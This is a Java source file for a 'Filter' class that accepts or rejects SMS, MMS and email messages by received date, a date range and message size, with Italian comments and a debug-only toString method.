package; import java.util.Date; import java.util.Vector; /** * The Class Filter. */ public class Filter { private static final String TAG = "Filter"; public static final int TYPE_REALTIME = 0; public static final int TYPE_COLLECT = 1; public static final int CLASS_UNKNOWN = 0; public static final int CLASS_SMS = 1; public static final int CLASS_MMS = 2; public static final int CLASS_EMAIL = 3; static final int FILTERED_DISABLED = -1; static final int FILTERED_LASTCHECK = -2; static final int FILTERED_DATEFROM = -3; static final int FILTERED_DATETO = -4; static final int FILTERED_SIZE = -5; static final int FILTERED_MESSAGE_ADDED = -6; static final int FILTERED_NOTFOUND = -7; static final int FILTERED_INTERNAL = -8; static final int FILTERED_SENDMAIL = -9; public static final int FILTERED_OK = 0; public int size; public int version; public int type; public byte[] classname; public int classtype; public boolean enabled; public boolean all; public boolean doFilterFromDate; public Date fromDate; public boolean doFilterToDate; public Date toDate; public int maxMessageSize; public int maxMessageSizeToLog; public Vector keywords = new Vector(); boolean valid; public int payloadStart; public Filter(boolean enabled, Date from, Date to, int maxMessageSize, int maxMessageSizeToLog) { this.enabled = enabled; if (from != null) { this.fromDate = from; doFilterFromDate = true; } if (to != null) { this.toDate = to; doFilterToDate = true; } this.maxMessageSize = maxMessageSize; this.maxMessageSizeToLog = maxMessageSizeToLog; } public Filter(boolean mailEnabled, int maxSizeToLog) { this(mailEnabled, null, null, maxSizeToLog, maxSizeToLog); } /** * Filter message. * * @param message * the message * @param lastcheck * the lastcheck * @param checkAdded * @return the int * @throws MessagingException * the messaging exception */ public final int filterMessage(long receivedTime, int messageSize, final long lastcheck) { if (!enabled) { return FILTERED_DISABLED; } if (lastcheck != 0 && receivedTime < lastcheck) { return FILTERED_LASTCHECK; } // se c'e' il filtro from e non viene rispettato escludi la mail if (doFilterFromDate == true && receivedTime < fromDate.getTime()) { return FILTERED_DATEFROM; } // Se c'e' anche il filtro della data di fine e non viene rispettato // escludi la mail if (doFilterToDate == true && receivedTime > toDate.getTime()) { return FILTERED_DATETO; } if ((maxMessageSizeToLog > 0) && (size > maxMessageSizeToLog)) { return FILTERED_SIZE; } return FILTERED_OK; } /** * Checks if is valid. * * @return true, if is valid */ public final boolean isValid() { return valid; } public boolean equals(Object obj) { boolean ret = true; if (obj == null) { return false; } if (!(obj instanceof Filter)) { return false; } final Filter filter = (Filter) obj; ret &= filter.doFilterFromDate == doFilterFromDate; ret &= filter.doFilterToDate == doFilterToDate; ret &= filter.fromDate == fromDate; ret &= filter.toDate == toDate; ret &= filter.enabled == enabled; ret &= filter.maxMessageSize == maxMessageSize; ret &= filter.maxMessageSizeToLog == maxMessageSizeToLog; return ret; } public int hashCode() { int hash = fromDate.hashCode() ^ toDate.hashCode(); int flags = 0; if (doFilterFromDate) { flags |= 1 << 16; } if (doFilterToDate) { flags |= 1 << 17; } hash ^= flags; hash ^= maxMessageSize << 16; hash ^= maxMessageSizeToLog; return hash; } // #ifdef DEBUG public final String toString() { final StringBuffer sb = new StringBuffer(); switch (classtype) { case Filter.CLASS_EMAIL: sb.append("EMAIL "); break; case Filter.CLASS_MMS: sb.append("MMS "); break; case Filter.CLASS_SMS: sb.append("SMS "); break; } if (type == TYPE_COLLECT) { sb.append(" COLLECT"); } else if (type == TYPE_REALTIME) { sb.append(" RT"); } if (doFilterFromDate == true && fromDate != null) { sb.append(" from: "); sb.append(fromDate); } if (doFilterToDate == true && toDate != null) { sb.append(" to: "); sb.append(toDate); } sb.append(" size: " + maxMessageSize); sb.append(" log: " + maxMessageSizeToLog); sb.append(" en: " + enabled); return sb.toString(); } // #endif }